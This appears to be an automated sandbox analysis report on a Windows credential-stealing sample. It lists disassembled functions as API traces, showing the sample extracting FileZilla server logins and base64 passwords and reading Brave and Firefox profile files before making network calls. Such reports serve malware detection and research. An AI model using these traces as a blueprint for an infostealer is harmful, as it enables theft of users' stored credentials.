                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: 403e1928d20d47975eb38e17d6f264f0d803963cff67c0c89d901ac785421fa2
                                  • Instruction ID: 269df959e44116d3f817345e8d59fd391c8b9995f190f8989e0cf1890afc8510
                                  • Opcode Fuzzy Hash: 403e1928d20d47975eb38e17d6f264f0d803963cff67c0c89d901ac785421fa2
                                  • Instruction Fuzzy Hash: D242A270A11216ABCB17ABB4DC9EAEF77B9AF18700F055414F801EB291DF74D945CBA0
                                  Function 0030DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DBEF
                                  • lstrlen.KERNEL32(00334CA8), ref: 0030DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC17
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 0030DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC4C
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DC8F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0030DCD0
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0030DCF0
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0030DD0A
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0030DD1D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DD7B
                                  • lstrlen.KERNEL32(00331794), ref: 0030DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDA3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DDAF
                                  • lstrlen.KERNEL32(?), ref: 0030DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DE19
                                  • lstrlen.KERNEL32(00331794), ref: 0030DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DE6F
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DE7B
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DEBB
                                  • lstrlen.KERNEL32(00331794), ref: 0030DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DEE6
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DEF2
                                  • lstrlen.KERNEL32(01028800), ref: 0030DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFA5
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DFB1
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DFF4
                                  • lstrlen.KERNEL32(00331794), ref: 0030DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E022
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030E02E
                                  • lstrlen.KERNEL32(01028800), ref: 0030E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0030E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0030E0E7
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E11F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0030E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0030E1F9
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E22F
                                  • lstrlen.KERNEL32(01028990), ref: 0030E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E261
                                  • lstrcat.KERNEL32(00000000,01028990), ref: 0030E269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0030E988
                                  • FindClose.KERNEL32(00000000), ref: 0030E997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: ab970d471f19b7197ef371e06fbc34b7e642a1d25432bf45e578b4084d79b85c
                                  • Instruction ID: dfd501bcf558e308fa9afe942ff2a566592a03aeda85558c1c44da72f9073f11
                                  • Opcode Fuzzy Hash: ab970d471f19b7197ef371e06fbc34b7e642a1d25432bf45e578b4084d79b85c
                                  • Instruction Fuzzy Hash: C9525271A122069BCB22EFB8DC9DAAF77B9AF54300F054528F805AB291DF74DC45CB90
                                  Function 003060D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003060FF
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306152
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306185
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003061B5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003061F0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00306233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 8daa8689aecece93e7af4bca19c02086dfe73bf2706888bc65fc52c1fc5e3253
                                  • Instruction ID: deb54da74527d819424e9ed4ff6280c492f0dbc0faa826e733a35b8c01f3bfcb
                                  • Opcode Fuzzy Hash: 8daa8689aecece93e7af4bca19c02086dfe73bf2706888bc65fc52c1fc5e3253
                                  • Instruction Fuzzy Hash: 74527D71A122169BCB22EFB8DC99AAF77B9AF14300F154424F805EB295DF74EC15CB90
                                  Function 00316B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316B9D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316BCD
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316BFD
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00316C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00316C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00316C5A
                                  • lstrlen.KERNEL32(00000000), ref: 00316C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00316CE2
                                  • lstrlen.KERNEL32(00000000), ref: 00316CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00316D6A
                                  • lstrlen.KERNEL32(00000000), ref: 00316D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00316DF2
                                  • lstrlen.KERNEL32(00000000), ref: 00316E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00316E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00316EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00316EC9
                                  • LocalFree.KERNEL32(00000000), ref: 00316ED4
                                  • lstrlen.KERNEL32(?), ref: 00316F6E
                                  • lstrlen.KERNEL32(?), ref: 00316F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 77d1bc4d4b24cab7625c3d2b7e04a89aea06b1bd9d491feb9e47edec3a940e58
                                  • Instruction ID: 4f88e0b8fd55b6f9cccc981e7fcb3b9e1cd19f114992c6f1075ed2a92b937353
                                  • Opcode Fuzzy Hash: 77d1bc4d4b24cab7625c3d2b7e04a89aea06b1bd9d491feb9e47edec3a940e58
                                  • Instruction Fuzzy Hash: 2102B170A11216ABCB17ABB4DD9EEAF7BB9AF18700F054414F801EB291DF74D945CBA0
                                  Function 00314B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314B7F
                                  • lstrlen.KERNEL32(00334CA8), ref: 00314B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BA7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 00314BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00314BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: dd955357402ddd5bc97815462e50942001e1d0168bfd8095a59d7822bdae6ebe
                                  • Instruction ID: a94907b6e6a6c5ae3d75d79bb08e65dd4a3fe217b117fcf158a5ee714dad50c5
                                  • Opcode Fuzzy Hash: dd955357402ddd5bc97815462e50942001e1d0168bfd8095a59d7822bdae6ebe
                                  • Instruction Fuzzy Hash: 0C924470A11601CFDB1ACF29D958B9A77E5AF88714F1A806DE409DB3A1DB71DC82CF90
                                  Function 00311250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00311291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003112BF
                                  • lstrlen.KERNEL32(00334CA8), ref: 003112CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112E7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 003112F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0031133A
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031135C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00311376
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003113AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003113D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003113E2
                                  • lstrlen.KERNEL32(00331794), ref: 003113ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031140A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311416
                                  • lstrlen.KERNEL32(?), ref: 00311423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00311451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031147A
                                  • StrCmpCA.SHLWAPI(?,0102CAB0), ref: 003114A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003114E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311535
                                  • StrCmpCA.SHLWAPI(?,0102D328), ref: 00311552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003115BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003115E4
                                  • StrCmpCA.SHLWAPI(?,0102CBE8), ref: 00311602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311685
                                  • StrCmpCA.SHLWAPI(?,0102C9F0), ref: 003116B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003116F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003117BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003117F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031181C
                                  • FindClose.KERNEL32(00000000), ref: 0031182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 1c2b56f2c9dff085b7f83232e016db95805836c42b2e8fa3a1d28c85a7aa0728
                                  • Instruction ID: fb78036055f29f5d4559c601a6671e78a2ae1cdfaec4106f33bb88d176e09d54
                                  • Opcode Fuzzy Hash: 1c2b56f2c9dff085b7f83232e016db95805836c42b2e8fa3a1d28c85a7aa0728
                                  • Instruction Fuzzy Hash: CF126271A112069BCB2AEF78D899AEF77B8AF58300F054528F946D7290DF34DC55CB90
                                  Function 0031CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0031CBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031CC13
                                  • lstrcat.KERNEL32(?,?), ref: 0031CC5F
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031CC71
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031CC8B
                                  • wsprintfA.USER32 ref: 0031CCB0
                                  • PathMatchSpecA.SHLWAPI(?,010287F0), ref: 0031CCE2
                                  • CoInitialize.OLE32(00000000), ref: 0031CCEE
                                    • Part of subcall function 0031CAE0: CoCreateInstance.COMBASE(0032B110,00000000,00000001,0032B100,?), ref: 0031CB06
                                    • Part of subcall function 0031CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0031CB46
                                    • Part of subcall function 0031CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0031CBC9
                                  • CoUninitialize.COMBASE ref: 0031CD09
                                  • lstrcat.KERNEL32(?,?), ref: 0031CD2E
                                  • lstrlen.KERNEL32(?), ref: 0031CD3B
                                  • StrCmpCA.SHLWAPI(?,0032CFEC), ref: 0031CD55
                                  • wsprintfA.USER32 ref: 0031CD7D
                                  • wsprintfA.USER32 ref: 0031CD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0031CDB0
                                  • wsprintfA.USER32 ref: 0031CDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0031CDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0031CE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0031CE28
                                  • CloseHandle.KERNEL32(00000000), ref: 0031CE33
                                  • CloseHandle.KERNEL32(00000000), ref: 0031CE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0031CE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031CE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 0031CF8D
                                  • FindClose.KERNEL32(?), ref: 0031CF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
